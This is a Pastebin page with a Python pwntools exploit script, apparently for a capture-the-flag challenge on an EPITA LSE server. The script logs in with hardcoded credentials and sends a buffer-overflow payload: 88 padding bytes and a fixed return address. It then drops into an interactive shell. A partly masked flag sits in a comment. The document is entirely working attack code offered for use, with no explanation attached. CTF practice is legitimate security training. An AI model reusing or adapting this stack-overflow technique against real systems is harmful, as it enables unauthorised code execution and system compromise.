Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #Author : Faid Amine
- from pwn import *
- #LSE{e4xxxxxxxxxxx}
- #Login Info
- user = "admin"
- passw = "T6OBSh2i"
- s = remote('ctf.lse.epita.fr',52190)
- command = "/bin/sh"
- off = 88
- #### PAYLOAD
- payload = "A"*off
- payload += p64(0x40084a)
- ## Connect
- s.recvuntil("username: ")
- s.sendline(user)
- s.recvuntil("password: ")
- s.sendline(passw)
- s.recvuntil("choice: ")
- s.sendline("1")
- ### Send Command /bin/sh
- s.recvuntil("Command: ")
- s.sendline(command)
- ### Send Payload
- s.recvuntil("choice: ")
- s.sendline(payload)
- ### Exit
- s.recvuntil("choice: ")
- s.sendline("3")
- s.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement